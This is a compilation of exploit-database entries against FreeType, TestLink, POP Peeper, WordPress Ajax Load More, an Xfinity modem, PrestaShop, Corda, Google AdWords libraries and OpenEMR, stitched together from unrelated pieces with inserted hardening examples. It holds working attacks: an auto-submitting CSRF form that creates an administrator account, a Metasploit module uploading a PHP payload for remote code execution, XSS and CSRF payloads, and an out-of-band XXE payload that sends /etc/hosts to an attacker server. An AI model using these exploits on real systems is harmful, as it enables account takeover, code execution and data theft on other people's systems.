Source: https://code.google.com/p/google-security-research/issues/detail?id=614
The following heap-based out-of-bounds memory read has been encountered in FreeType. It has been reproduced with the current version of freetype2 from master git branch, with a 64-bit build of the ftbench utility compiled with AddressSanitizer:
$ ftbench <file>
Attached are three POC files which trigger the conditions.
---
$ freetype2-demos/bin/ftbench asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b
ftbench results for font `asan_heap-oob_783b6f_6837_eb01136f859a0091cb61f7beccd7059b'
-------------------------------------------------------------------------------------
family: (null)
style: (null)
number of seconds for each test: 2.000000
starting glyph index: 0
face size: 10ppem
font preloading into memory: no
load flags: 0x0
render mode: 0
CFF engine set to Adobe
TrueType engine set to version 35
maximum cache size: 1024KiByte
executing tests:
Load =================================================================
==22366==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000eb55 at pc 0x00000069e2fc bp 0x7fffc4670610 sp 0x7fffc4670608
READ of size 1 at 0x60200000eb55 thread T0
#0 0x69e2fb in tt_sbit_decoder_load_bit_aligned freetype2/src/sfnt/ttsbit.c:834:19
#1 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#2 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#3 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
#4 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#5 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#6 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
#7 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
#8 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
#9 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
#10 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
#11 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
#12 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
#13 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9
0x60200000eb55 is located 0 bytes to the right of 5-byte region [0x60200000eb50,0x60200000eb55)
allocated by thread T0 here:
#0 0x4bc4a8 in malloc llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:40
#1 0x756740 in ft_alloc freetype2/src/base/ftsystem.c:74:12
#2 0x51b4e7 in ft_mem_qalloc freetype2/src/base/ftutil.c:76:15
#3 0x51abb1 in FT_Stream_EnterFrame freetype2/src/base/ftstream.c:269:12
#4 0x51a800 in FT_Stream_ExtractFrame freetype2/src/base/ftstream.c:200:13
#5 0x69ccab in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1036:10
#6 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#7 0x69eee2 in tt_sbit_decoder_load_compound freetype2/src/sfnt/ttsbit.c:932:15
#8 0x69d214 in tt_sbit_decoder_load_bitmap freetype2/src/sfnt/ttsbit.c:1145:15
#9 0x69b1bf in tt_sbit_decoder_load_image freetype2/src/sfnt/ttsbit.c:1340:12
#10 0x6893d2 in tt_face_load_sbit_image freetype2/src/sfnt/ttsbit.c:1506:19
#11 0x55d265 in load_sbit_image freetype2/src/truetype/ttgload.c:2127:13
#12 0x55bedc in TT_Load_Glyph freetype2/src/truetype/ttgload.c:2487:15
#13 0x5301a2 in tt_glyph_load freetype2/src/truetype/ttdriver.c:396:13
#14 0x4f18ae in FT_Load_Glyph freetype2/src/base/ftobjs.c:742:15
#15 0x4e966e in test_load freetype2-demos/src/ftbench.c:250:13
#16 0x4e9c3f in benchmark freetype2-demos/src/ftbench.c:216:15
#17 0x4e80e9 in main freetype2-demos/src/ftbench.c:1058:9
SUMMARY: AddressSanitizer: heap-buffer-overflow freetype2/src/sfnt/ttsbit.c:834:19 in tt_sbit_decoder_load_bit_aligned
Shadow bytes around the buggy address:
0x0c047fff9d10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c047fff9d50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c047fff9d60: fa fa fa fa fa fa fa fa fa fa[05]fa fa fa fd fa
0x0c047fff9d70: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9d80: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa
0x0c047fff9d90: fa fa fd fa fa fa 04 fa fa fa 00 fa fa fa fd fa
0x0c047fff9da0: fa fa fd fa fa fa fd fd fa fa fd fd fa fa fd fd
0x0c047fff9db0: fa fa fd fd fa fa fd fd fa fa fd fd fa fa fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==22366==ABORTING
---
The issue was reported in https://savannah.nongnu.org/bugs/?46379.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38662.zip
Information
=================================
Name: CSRF Vulnerability in TestLink 1.9.14
Affected Software: TestLink
Affected Versions: 1.9.14 and possibly below
Vendor Homepage: http://testlink.org/
Severity: High
Status: Fixed
Vulnerability Type:
=================================
Cross Site Request Forgery (CSRF)
CVE Reference:
=================================
Not assigned
Technical Details:
=================================
Although the application implements CSRF tokens, they are not properly
validated on the server side. An attacker can therefore craft malicious
requests and have the server process them on behalf of the victim. By
exploiting this vulnerability, the attacker is able to create user accounts
with administrator privileges in the application.
Exploit Code
=================================
<html lang="en">
<head>
  <title>CSRF Exploit to Create New Administrator Account</title>
</head>
<body>
  <form action="http://localhost/testlink_1_9_14/lib/usermanagement/usersEdit.php"
        id="formid" method="post">
    <input type="hidden" name="CSRFName" value="" />
    <input type="hidden" name="CSRFToken" value="" />
    <input type="hidden" name="user_id" value="" />
    <input type="hidden" name="user_login" value="" />
    <input type="hidden" name="login" value="new_admin" />
    <input type="hidden" name="firstName" value="new_administrator_fname" />
    <input type="hidden" name="lastName" value="new_administrator_lname" />
    <input type="hidden" name="password" value="new_administrator_password" />
    <input type="hidden" name="emailAddress" value="new_administrator@admin.com" />
    <input type="hidden" name="rights_id" value="8" />
    <input type="hidden" name="locale" value="en_GB" />
    <input type="hidden" name="authentication" value="" />
    <input type="hidden" name="user_is_active" value="on" />
    <input type="hidden" name="doAction" value="doCreate" />
    <input type="hidden" name="do_update" value="Save" />
  </form>
  <script>
    document.getElementById('formid').submit();
  </script>
</body>
</html>
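The following is an added illustration and not TestLink's code: a hypothetical token check that shows how a per-request CSRF token can be issued and still accept the request the form above sends (empty CSRFName and CSRFToken), next to a validation that rejects it. The session layout, the function names and the issuing scheme are assumptions for the example; only the field names come from the exploit form.

```php
<?php
// Added example, not TestLink's code. Both checks are hypothetical
// illustrations of how a CSRF token can be issued per request and still
// protect nothing because of how it is validated. Session layout and
// function names are assumptions; the POST field names match the exploit form.

// Issue a token: random name and value stored in the session and meant to be
// echoed into the form as CSRFName / CSRFToken.
function csrf_issue(): array {
    $name  = 'CSRFName_' . bin2hex(random_bytes(8));
    $token = bin2hex(random_bytes(32));
    $_SESSION['csrf'][$name] = $token;
    return [$name, $token];
}

// Flawed check: lets the client pick which stored token to compare against
// and uses loose comparison. For CSRFName="" and CSRFToken="" (exactly what
// the exploit form sends) the lookup yields null, and "" == null is true in
// PHP, so the forged request passes.
function csrf_check_broken(array $post): bool {
    $name   = $post['CSRFName']  ?? '';
    $token  = $post['CSRFToken'] ?? '';
    $stored = $_SESSION['csrf'][$name] ?? null;
    return $token == $stored;
}

// Hardened check: both fields must be non-empty strings, the name must be one
// this server issued, comparison is constant-time, and the token is consumed
// so a captured one cannot be replayed.
function csrf_check_fixed(array $post): bool {
    $name  = $post['CSRFName']  ?? null;
    $token = $post['CSRFToken'] ?? null;
    if (!is_string($name) || !is_string($token) || $name === '' || $token === '') {
        return false;
    }
    if (!isset($_SESSION['csrf'][$name])) {
        return false;
    }
    $stored = $_SESSION['csrf'][$name];
    unset($_SESSION['csrf'][$name]);
    return hash_equals($stored, $token);
}

function expect(bool $cond, string $what): void {
    echo ($cond ? 'ok   ' : 'FAIL ') . $what . PHP_EOL;
}

// Demo against a simulated session (no session_start() needed).
$_SESSION = [];
[$name, $token] = csrf_issue();

// The exploit's request: empty token fields plus the account-creation fields.
$forged = ['CSRFName' => '', 'CSRFToken' => '', 'doAction' => 'doCreate',
           'login' => 'new_admin', 'rights_id' => '8'];
// A request submitted from the real form.
$legit  = ['CSRFName' => $name, 'CSRFToken' => $token, 'doAction' => 'doCreate',
           'login' => 'alice', 'rights_id' => '8'];

expect(csrf_check_broken($forged) === true,  'broken check accepts the forged request');
expect(csrf_check_fixed($forged)  === false, 'fixed check rejects the forged request');
expect(csrf_check_fixed($legit)   === true,  'fixed check accepts a freshly issued token');
expect(csrf_check_fixed($legit)   === false, 'fixed check rejects the same token replayed');
```

The hardened check never lets the client choose which stored value it is compared against, refuses empty fields, compares with hash_equals() and consumes the token; any of the first three alone would already defeat the form above.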
Exploitation Technique:
===================================
Remote
Severity Level:
===================================
High
Advisory Timeline
===================================
Sat, 7 Nov 2015 13:14:33 +0530 - First Contact
Sat, 7 Nov 2015 08:52:14 +0100 - Vendor Response
Sat, 7 Nov 2015 13:00:54 +0100 - Vendor Fixed
Sun, 8 Nov 2015 19:03:00 +0530 - Public Disclosure
Solution
====================================
This vulnerability is fixed in TestLink 1.9.15 (Tauriel)
Fix: https://github.com/TestLinkOpenSourceTRMS/testlink-code/commit/1cb1f78f1a50f6e6819bcbadeae345eb3213c487
Credits & Authors
====================================
Aravind C Ajayan, Balagopal N
'''
********************************************************************************************
# Exploit Title: POP Peeper SEH Over-write.
# Date: 9/14/2015
# Exploit Author: Un_N0n
# Software Link: http://www.esumsoft.com/download
# Version: v4.0.1
# Tested on: Windows 7 x86(32 BIT)
********************************************************************************************
[DUMP:]
'''
EAX 00000000
ECX 20203029
EDX 77C5660D ntdll.77C5660D
EBX 00000000
ESP 0012EC5C
EBP 0012EC7C
ESI 00000000
EDI 00000000
EIP 20203029
==============================
STACK:
0012FBF4 41414141
0012FBF8 41414141
0012FBFC 41414141
0012FC00 41414141
0012FC04 41414141
0012FC08 909020EB Pointer to next SE>
0012FC0C 20203029 SE handler
0012FC10 43434343
0012FC14 43434343
0012FC18 43434343
0012FC1C 43434343
0012FC20 43434343
0012FC24 43434343
0012FC28 43434343
===============================
'''
[Steps to Produce the Crash]:
1- Open 'POPPeeper.exe'.
2- Go to Accounts->Add->CreateSingleAccount.
3- After entering the email address, the Account name field appears;
enter the contents of crash.txt in it->Save.
4- Compose a new mail; in the TO field and the Subject field, enter the contents of crash.txt.
5- Save as Draft; the software will crash.
6- Open "POPPeeper.exe" again.
7- Click on the Check Mail option; the software will crash.
Every time you click on Check Mail it will crash, because it loads the saved DRAFT.
[Code to produce CRASH.txt]
'''
buffer = "A"*66666
file = "crash.txt"
f = open(file,'w')
f.write(buffer)
f.close()
'''
[Extra Info:]
Offset : 2052
**********************************************************************************************
'''
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wordpress Ajax Load More PHP Upload Vulnerability',
      'Description'    => %q{
        This module exploits an arbitrary file upload in the WordPress Ajax Load More
        version 2.8.1.1. It allows to upload arbitrary php files and get remote code
        execution. This module has been tested successfully on WordPress Ajax Load More
        2.8.0 with Wordpress 4.1.3 on Ubuntu 12.04/14.04 Server.
      },
      'Author'         =>
        [
          'Unknown', # Identify yourself || send an PR here
          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['WPVDB', '8209']
        ],
      'Privileged'     => false,
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        => [['Ajax Load More 2.8.1.1', {}]],
      'DisclosureDate' => 'Oct 10 2015',
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        OptString.new('WP_USERNAME', [true, 'A valid username', nil]),
        OptString.new('WP_PASSWORD', [true, 'Valid password for the provided username', nil])
      ], self.class
    )
  end

  def check
    check_plugin_version_from_readme('ajax-load-more', '2.8.1.2')
  end

  def username
    datastore['WP_USERNAME']
  end

  def password
    datastore['WP_PASSWORD']
  end

  # The alm_save_repeater AJAX action requires the plugin's admin nonce, which
  # is embedded in the repeaters admin page.
  def get_nonce(cookie)
    res = send_request_cgi(
      'method'   => 'GET',
      'uri'      => normalize_uri(wordpress_url_backend, 'admin.php'),
      'vars_get' => {
        'page' => 'ajax-load-more-repeaters'
      },
      'cookie'   => cookie
    )

    if res && res.body && res.body =~ /php","alm_admin_nonce":"([a-z0-9]+)"}/
      return Regexp.last_match[1]
    else
      return nil
    end
  end

  def exploit
    vprint_status("#{peer} - Trying to login as #{username}")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, "#{peer} - Unable to login as: #{username}") if cookie.nil?

    vprint_status("#{peer} - Trying to get nonce")
    nonce = get_nonce(cookie)
    fail_with(Failure::Unknown, "#{peer} - Unable to get nonce") if nonce.nil?

    vprint_status("#{peer} - Trying to upload payload")

    # This must be default.php
    filename = 'default.php'

    print_status("#{peer} - Uploading payload")
    res = send_request_cgi(
      'method'    => 'POST',
      'uri'       => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
      'vars_post' => {
        'action'   => 'alm_save_repeater',
        'value'    => payload.encoded,
        'repeater' => 'default',
        'type'     => 'default',
        'alias'    => '',
        'nonce'    => nonce
      },
      'cookie'    => cookie
    )

    if res
      if res.code == 200 && res.body.include?('Template Saved Successfully')
        register_files_for_cleanup(filename)
      else
        fail_with(Failure::Unknown, "#{peer} - You do not have sufficient permissions to access this page.")
      end
    else
      fail_with(Failure::Unknown, 'Server did not respond in an expected way')
    end

    print_status("#{peer} - Calling uploaded file")
    send_request_cgi(
      'uri' => normalize_uri(wordpress_url_plugins, 'ajax-load-more', 'core', 'repeater', filename)
    )
  end
end
<!--
# Exploit Title: Unauthenticated Stored Xss
# Date: 11/6/15
# Exploit Author: Nu11By73
# Vendor Homepage: comcast.net and arrisi.com
# Version: eMTA & DOCSIS Software Version: 10.0.59.SIP.PC20.CT
Software Image Name:TG1682_2.0s7_PRODse
Advanced Services:TG1682G
Packet Cable:2.0
# Tested on: Default Install
-->
<html>
<p>Unauth Stored CSRF/XSS - Xfinity Modem</p>
<form method="POST" action="http://192.168.0.1/actionHandler/ajax_managed_services.php">
  <input type="hidden" name="set" value="true" />
  <input type="hidden" name="UMSStatus" value="Enabled" />
  <input type="hidden" name="add" value="true" />
  <input type="hidden" name="service" value="test><script>alert(1)</script>" />
  <input type="hidden" name="protocol" value="TCP" />
  <input type="hidden" name="startPort" value="1" />
  <input type="hidden" name="endPort" value="2" />
  <input type="hidden" name="block" value="true" />
  <input type="submit" title="Enable Service" />
</form>
</html>
source: https://www.securityfocus.com/bid/61158/info
PrestaShop is prone to multiple cross-site request-forgery vulnerabilities.
Exploiting these issues may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.
PrestaShop 1.5.4 is vulnerable; other versions may also be affected.
<html>
<head></head>
<body>
<img src="http://www.example.com/language/cart?add=&id_product=[Product ID]" width=0 height=0>
</body>
</html>
source: https://www.securityfocus.com/bid/61156/info
Corda .NET Redirector is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
Corda .NET Redirector 7.3.11.6715 is vulnerable; other versions may also be affected.
http://www.example.com/Corda/redirector.corda/? () _FILEhttp://<URL>/?<script>alert('Text')</script><iframe src=http://www.example1.com></iframe>@_TEXTDESCRIPTIONEN
# Date: 06.11.2015
# Exploit Author: Dawid Golunski
# Vendor Homepage: https://developers.google.com/adwords/api/docs/clientlibraries
# Software Link: https://github.com/googleads/googleads-php-lib
# Version: Google AdWords API client libraries - XML eXternal Entity Injection (XXE)
=============================================
- Release date: 06.11.2015
- Discovered by: Dawid Golunski
- Severity: Medium/High
=============================================
I. VULNERABILITY
-------------------------
Google AdWords API client libraries - XML eXternal Entity Injection (XXE)
Confirmed in googleads-php-lib <= 6.2.0 for PHP. The AdWords libraries for
other platforms, googleads-java-lib for Java and googleads-dotnet-lib for .NET,
are also likely to be affected.
II. BACKGROUND
-------------------------
- AdWords API
"The AdWords API is a collection of web services that you can use to build
applications that manage AdWords accounts and their associated campaign data.
While the AdWords API is based on SOAP 1.1, high-level client libraries are
provided to help you develop applications more quickly."
AdWords API client libraries are available for different platforms
such as PHP, .NET, Java etc.
These can be found at:
https://developers.google.com/adwords/api/docs/clientlibraries
III. INTRODUCTION
-------------------------
Because the Google AdWords API is based on SOAP, which uses XML to transfer
data, the client API libraries should include the necessary protections against
XML eXternal Entity injection attacks. Independent research found these
protections to be lacking in several Google AdWords API client libraries, which
could allow XXE attacks on applications and servers that make use of them.
An XXE (XML eXternal Entity) attack targets an application that parses XML
input from untrusted sources with an incorrectly configured XML parser.
The application may be forced to open arbitrary files and/or network resources.
Exploiting XXE issues in PHP applications may also lead to denial of service or,
in some cases (when the 'expect' PHP module is installed), to command
execution.
IV. DESCRIPTION
-------------------------
This advisory focuses on the PHP version of the AdWords API client library.
Other versions of the client library, such as .NET and Java, appear to be
vulnerable in a similar way.
googleads-php-lib contains the following function, which fetches the WSDL from
the remote Google AdWords server:
---[ build_lib/WSDLInterpreter/WSDLInterpreter.php ]---
  protected function loadWsdl($wsdlUri, $proxy = null) {
    // Set proxy.
    if ($proxy) {
      $opts = array(
          'http' => array(
              'proxy' => $proxy,
              'request_fulluri' => true
          )
      );
      $context = stream_context_get_default($opts);
      libxml_set_streams_context($context);
    }
    $this->dom = new DOMDocument();
    $this->dom->load($wsdlUri,
        LIBXML_DTDLOAD|LIBXML_DTDATTR|LIBXML_NOENT|LIBXML_XINCLUDE);
    $this->serviceNamespace =
        $this->dom->documentElement->getAttribute('targetNamespace');
  }
-------------------------------------------------------
The function connects to the API endpoint to get the WSDL document describing
the functionality of the AdWords web service in XML.
For security reasons Google AdWords API can only be accessed via HTTPS.
However, the above code does not set appropriate SSL settings on the
https:// stream context: it neither assigns a Certificate Authority (CA)
bundle nor turns the verify_peer option on.
It uses stream_context_get_default() to obtain the default context, which on
all PHP versions before 5.6 (see references below) does not validate the peer
certificate by default.
Because of this, applications using the AdWords API library may be tricked into
retrieving data from untrusted sources pretending to be adwords.google.com.
The above code also provides no protection against XXE injection. Not only
does it fail to disable external entity processing, it explicitly enables it
via the LIBXML flags passed to dom->load(), so an XXE injection attack works
even on systems running the newest, fully patched libxml, which does not
process external entities by default.
Another vulnerable part of the application is located in the code:
---[ src/Google/Api/Ads/Common/Util/XmlUtils.php ]---
  public static function GetDomFromXml($xml) {
    set_error_handler(array('XmlUtils', 'HandleXmlError'));
    $dom = new DOMDocument();
    $dom->loadXML($xml,
        LIBXML_DTDLOAD | LIBXML_DTDATTR | LIBXML_NOENT | LIBXML_XINCLUDE);
    restore_error_handler();
    return $dom;
  }
-----------------------------------------------------
which the AdsSoapClient class uses to process SOAP requests. It also
activates entity processing even if the libxml parser is configured to
ignore entities by default. AdsSoapClient can be configured to verify the SSL
peer via the settings INI file, but this option is off by default.
These SSL settings and the XML entity processing combined make applications
using the AdWords API vulnerable to XXE injection attacks.
For the attack to succeed, an attacker needs to perform a MitM attack that
impersonates the adwords.google.com server (e.g. via DNS poisoning/spoofing,
proxy attacks, ARP spoofing, etc.) in order to inject malicious XML input.
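As an added example (not code from googleads-php-lib), here is a parser configured the way the two functions above are, beside a hardened fetch-and-parse path that pins TLS verification on and refuses entity processing; both parsers are run against a constructed WSDL of the kind a MitM attacker would return. The CA bundle path, and the use of a local file in place of the attacker's remote .dtd so the demo runs offline, are assumptions for the example.

```php
<?php
// Added example, not code from googleads-php-lib. It reproduces the two
// conditions described above (entity processing forced on through the LIBXML
// flags, and no certificate verification on the https:// stream) next to a
// hardened fetch-and-parse path, and runs both parsers against a constructed
// payload. The CA bundle path is an assumption for the example.

// What a MitM impersonating adwords.google.com might return; constructed for
// this demo. file:///etc/passwd stands in for the advisory's remote .dtd so
// the demo runs offline; libxml still treats it as an external entity.
const MALICIOUS_WSDL = <<<'XML'
<?xml version="1.0"?>
<!DOCTYPE definitions [
  <!ENTITY xxetest SYSTEM "file:///etc/passwd">
]>
<definitions targetNamespace="https://adwords.google.com/api/adwords/cm/v201502">
  <leak>&xxetest;</leak>
</definitions>
XML;

// Same flags as XmlUtils::GetDomFromXml() and loadWsdl(): LIBXML_NOENT
// substitutes entities and LIBXML_DTDLOAD loads the external subset, so the
// entity is resolved even on libxml builds that leave entities alone by default.
function parse_vulnerable(string $xml): DOMDocument {
    $dom = new DOMDocument();
    $dom->loadXML($xml, LIBXML_DTDLOAD | LIBXML_DTDATTR | LIBXML_NOENT | LIBXML_XINCLUDE);
    return $dom;
}

// Hardened parser: a WSDL or SOAP envelope has no business carrying a DOCTYPE,
// so refuse one outright; never pass LIBXML_NOENT; add LIBXML_NONET so the
// parser itself cannot reach the network. (On PHP < 8 with libxml < 2.9 also
// call libxml_disable_entity_loader(true) first.)
function parse_hardened(string $xml): DOMDocument {
    if (preg_match('/<!DOCTYPE/i', $xml)) {
        throw new RuntimeException('refusing XML with a DOCTYPE declaration');
    }
    $dom = new DOMDocument();
    $dom->resolveExternals   = false;
    $dom->substituteEntities = false;
    if (!$dom->loadXML($xml, LIBXML_NONET)) {
        throw new RuntimeException('malformed XML');
    }
    return $dom;
}

// TLS context with verification pinned on explicitly, so it does not depend on
// the PHP 5.6 change to the default stream context that the advisory notes.
function wsdl_stream_context(?string $proxy = null) {
    $opts = [
        'ssl'  => [
            'verify_peer'       => true,
            'verify_peer_name'  => true,
            'allow_self_signed' => false,
            'cafile'            => '/etc/ssl/certs/ca-certificates.crt', // assumed path
        ],
        'http' => ['timeout' => 10],
    ];
    if ($proxy !== null) {
        $opts['http']['proxy'] = $proxy;
        $opts['http']['request_fulluri'] = true;
    }
    return stream_context_create($opts);
}

// Fetch the WSDL with the verified context, then hand the bytes to the
// hardened parser so the XML layer never touches the network. Not exercised
// in the offline demo below.
function load_wsdl_hardened(string $wsdlUri, ?string $proxy = null): DOMDocument {
    $xml = file_get_contents($wsdlUri, false, wsdl_stream_context($proxy));
    if ($xml === false) {
        throw new RuntimeException("failed to fetch $wsdlUri");
    }
    return parse_hardened($xml);
}

// Demo: the vulnerable parser substitutes the entity, so file content shows up
// inside <leak>; the hardened parser refuses the document before parsing it.
$leak = parse_vulnerable(MALICIOUS_WSDL)->getElementsByTagName('leak')->item(0);
$resolved = $leak !== null && trim($leak->textContent) !== '';
echo 'vulnerable parser resolved the external entity: ' . ($resolved ? 'yes' : 'no') . PHP_EOL;
try {
    parse_hardened(MALICIOUS_WSDL);
    echo 'hardened parser accepted the document (unexpected)' . PHP_EOL;
} catch (RuntimeException $e) {
    echo 'hardened parser: ' . $e->getMessage() . PHP_EOL;
}
```

The DOCTYPE rejection is deliberately crude: it is applied to the raw bytes before libxml sees them, so it does not depend on which libxml version or default the host has, and it stops both the direct and the parameter-entity (out-of-band) variants. Fetching the document with file_get_contents() and a verified context, rather than letting DOMDocument::load() pull the URL through the default context, is what removes the MitM precondition the advisory describes.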
V. PROOF OF CONCEPT
-------------------------
Below is a test application that makes use of the PHP Google AdWords API
library.
The application simply connects to the AdWords API endpoint to retrieve the
WSDL document.
---[ testAPI.php ]---
<?php
// Test application reading WSDL from Google AdWords
set_include_path('./build_lib/WSDLInterpreter/');
require_once 'WSDLInterpreter.php';

$wsdlUri = 'https://adwords.google.com/api/adwords/cm/v201502/'
    . 'CampaignService?wsdl';
$wsdlInterpreter = new WSDLInterpreter($wsdlUri, "AdWordsSoapClient", null,
    null, "CampaignService", "v201502", "Ads_Google",
    "./src/Google/Api/Ads/AdWords/Lib/AdWordsSoapClient.php", null, true, null);
?>
---------------------
To exploit this application, an attacker needs to impersonate the
adwords.google.com server via a MitM attack, as described above.
For simplicity, the following entry can be added to /etc/hosts on the victim's
server:
192.168.57.12 adwords.google.com
to simulate a successful MitM attack in which the attacker has, for example,
poisoned the DNS cache so that the adwords subdomain points at his malicious
web server (192.168.57.12).
The attacker then needs to serve a malicious XML file from that server to the
victim. An example payload could look as follows:
$ curl --insecure 'https://192.168.57.12/api/adwords/cm/v201502/CampaignService?wsdl'
<?xml version="1.0"?>
<!DOCTYPE root
[
<!ENTITY xxetest SYSTEM "http://192.168.57.12/adwords_xxe_hack.dtd">
]>
<test><testing>&xxetest;</testing></test>
The XML payload returned by the attacker will cause the vulnerable
AdWords API library to resolve the 'xxetest' entity and connect
back to the attacker's server to retrieve adwords_xxe_hack.dtd.
This can be verified on the victim's server by executing the demonstrated
testAPI.php script:
$ curl http://victims_server/googleads-php-lib-master/testAPI.php
The script will try to retrieve the WSDL/XML document from adwords.google.com
which will provide the above malicious XML.
After the injected entity is read, the attacker will get a connection from the
victim:
attacker@mitm# nc -vv -l 8080
Connection from victims_server port 8080 [tcp/http-alt] accepted
GET /adwords_xxe_hack.dtd HTTP/1.0
Host: 192.168.57.12:8080
At this point the attacker could add further entities to carry out an
out-of-band XXE attack that reads system files (such as /etc/passwd) from the
victim's server, or executes commands via the expect:// PHP wrapper if the
'expect' module is enabled.
For example, this payload:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/hosts">
<!ENTITY % dtd SYSTEM "http://192.168.57.12/send.dtd">
%dtd;
]>
<test><testing>test &send;</testing></test>
with another file located on the attacker's file server:
---[ send.dtd ]---
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://192.168.57.12:8080/retrieved/%file;'>">
%all;
------------------
would send the contents of the /etc/hosts file to the attacker.
VI. BUSINESS IMPACT
-------------------------
The severity of this issue is lowered to medium/high because, despite the XXE
injection vulnerability in the code, the attacker must impersonate the
adwords.google.com server in order to inject malicious XML.
Where such an impersonation is possible, the severity of the issue grows to
high/critical due to the exploitation possibilities that XXE injection
offers.
VII. SYSTEMS AFFECTED
-------------------------
The latest version of the Google AdWords API PHP client library was confirmed
to be vulnerable. The client libraries for other platforms seem to lack the
necessary XXE protections too.
For example, the Java version did not set the
'sax/features/external-general-entities' feature to off when creating an
instance of the DocumentBuilderFactory class, and the .NET version of the
AdWords API was missing an explicit 'ProhibitDtd' setting on the XMLReader.
The vulnerabilities were found in googleads-php-lib in versions below 5.9.0
(the current release at the time) and reported to Google in May 2015; they
were fixed only in version 6.3.0 of the AdWords PHP library.
VIII. SOLUTION
-------------------------
Install the latest version of the Google AdWords API library available for your
platform, and tighten SSL settings by enabling SSL CA verification in the
library settings file.
IX. REFERENCES
-------------------------
http://legalhackers.com/advisories/Google-AdWords-API-libraries-XXE-Injection-Vulnerability.txt
https://developers.google.com/adwords/api/docs/clientlibraries
https://github.com/googleads/googleads-php-lib
https://developers.google.com/adwords/api/docs/
PHP 5.6.x openssl certificates in PHP streams:
http://php.net/manual/en/migration56.openssl.php
http://legalhackers.com
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
http://legalhackers.com
XI. TIMELINE
-------------------------
May 18th, 2015: Advisory created and sent to Google Security Team
Nov 5th, 2015: Google, after half a year, confirm the vulnerability has been patched
Nov 6th, 2015: Advisory released publicly
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
source: https://www.securityfocus.com/bid/61154/info
OpenEMR is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
OpenEMR 4.1.1 patch-12 and prior are vulnerable.
1. Misc > Office Notes ('note' parameter is vulnerable with a POST to
/openemr-4.1.1/interface/main/onotes/office_comments_full.php)
#Request:
POST http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:16.0) Gecko/20100101 Firefox/16.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Proxy-Connection: keep-alive
Referer: http://www.example.com/openemr-4.1.1/interface/main/onotes/office_comments_full.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 43
mode=new&offset=0&active=all&note=<script>alert(document.cookie)</script>
#Response:
<snip>
<tr><td><input type=hidden value='' name='act115' id='act115'><input name='box115' id='box115'
